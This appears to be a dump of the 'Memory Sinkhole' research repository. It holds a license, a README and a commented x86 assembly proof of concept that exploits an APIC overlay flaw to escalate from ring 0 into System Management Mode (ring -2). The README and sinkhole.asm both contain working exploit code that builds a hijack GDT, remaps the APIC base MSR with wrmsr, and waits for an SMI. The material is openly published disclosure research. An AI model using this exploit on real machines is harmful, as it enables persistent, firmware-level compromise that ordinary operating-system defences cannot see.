├── LICENSE
├── README.md
├── sinkhole.asm
├── us-15-Domas-TheMemorySinkhole-wp.pdf
└── us-15-Domas-TheMemorySinkhole.pdf

/LICENSE:
--------------------------------------------------------------------------------
Copyright (c) 2015, Battelle Memorial Institute
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
## The Memory Sinkhole
: An x86 design flaw allowing ring -2 privilege escalation.

### Overview

The memory sinkhole is a design flaw in x86 processors that allows code to
escalate privileges into ring -2 (System Management Mode).

```
wbinvd
mov dword [0x10014], 0xffcf9aff
mov dword [0x10010], 0x9fa2ffff

mov eax, 0x1f5ff900
mov edx, 0
mov ecx, 0x1b
wrmsr

jmp $
```

The proof of concept [APIC overlay attack](sinkhole.asm) illustrates one
approach for using the flaw to elevate privileges.

### References

The technique is outlined in detail in the [Black Hat
presentation](https://www.youtube.com/watch?v=lR0nh-TdpVg).

Slides from the presentation are provided [here](us-15-Domas-TheMemorySinkhole.pdf).

The exploit [white paper](us-15-Domas-TheMemorySinkhole-wp.pdf) provides a
technical overview of the flaw and exploitation approach.

### Author

The Memory Sinkhole is a research effort from Christopher Domas
([@xoreaxeaxeax](https://twitter.com/xoreaxeaxeax)).

--------------------------------------------------------------------------------

/sinkhole.asm:
--------------------------------------------------------------------------------
; memory sinkhole proof of concept
; hijack ring -2 execution through the apic overlay attack.

; deployed in ring 0

; the SMBASE register of the core under attack
TARGET_SMBASE equ 0x1f5ef800

; the location of the attack GDT.
; this is determined by which register will be read out of the APIC
; for the GDT base.  the APIC registers at this range are hardwired,
; and outside of our control; the SMM code will generally be reading
; from APIC registers in the 0xb00 range if the SMM handler is page
; aligned, or the 0x300 range if the SMM handler is not page aligned.
; the register will be 0 if the SMM handler is aligned to a page
; boundary, or 0x10000 if it is not.
GDT_ADDRESS equ 0x10000

; the value added to SMBASE by the SMM handler to compute the
; protected mode far jump offset. we could eliminate the need for an
; exact value with a nop sled in the hook.
FJMP_OFFSET equ 0x8097

; the offset of the SMM DSC structure from which the handler loads
; critical information
DSC_OFFSET equ 0xfb00

; the descriptor value used in the SMM handler's far jump
DESCRIPTOR_ADDRESS equ 0x10

; MSR number for the APIC location
APIC_BASE_MSR equ 0x1b

; the target memory address to sinkhole
SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000)

; we will hijack the default SMM handler and point it to a payload
; at this physical address.
PAYLOAD_OFFSET equ 0x1000

; compute the desired base address of the CS descriptor in the GDT.
; this is calculated so that the fjmp performed in SMM is perfectly
; redirected to the payload hook at PAYLOAD_OFFSET.
CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET)

; we target the boot strap processor for hijacking.
APIC_BSP equ 0x100

; the APIC must be activated for the attack to work.
APIC_ACTIVE equ 0x800

;;; begin attack ;;;

; clear the processor caches,
; to prevent bypassing the memory sinkhole on data fetches
wbinvd

; construct a hijack GDT in memory under our control
; note: assume writing to identity mapped memory.
; if non-identity mapped, translate these through the page tables first.
; high dword of the descriptor: base[31:24], flags/access (0x00cf9a00),
; base[23:16].  the line continuations (backslashes) were lost in the
; flattened copy of this file and are restored here so NASM accepts it.
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4], \
	(CS_BASE&0xff000000) | (0x00cf9a00) | \
	(CS_BASE&0x00ff0000)>>16
; low dword of the descriptor: base[15:0], limit[15:0]
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0], \
	(CS_BASE&0x0000ffff)<<16 | 0xffff

; remap the APIC to sinkhole SMM's DSC structure
mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP
mov edx, 0
mov ecx, APIC_BASE_MSR
wrmsr

; wait for a periodic SMI to be triggered
jmp $

--------------------------------------------------------------------------------

/us-15-Domas-TheMemorySinkhole-wp.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Battelle/sinkhole/c6427cbca2a72c8126ac262b68df978e02bc424f/us-15-Domas-TheMemorySinkhole-wp.pdf

--------------------------------------------------------------------------------

/us-15-Domas-TheMemorySinkhole.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Battelle/sinkhole/c6427cbca2a72c8126ac262b68df978e02bc424f/us-15-Domas-TheMemorySinkhole.pdf

--------------------------------------------------------------------------------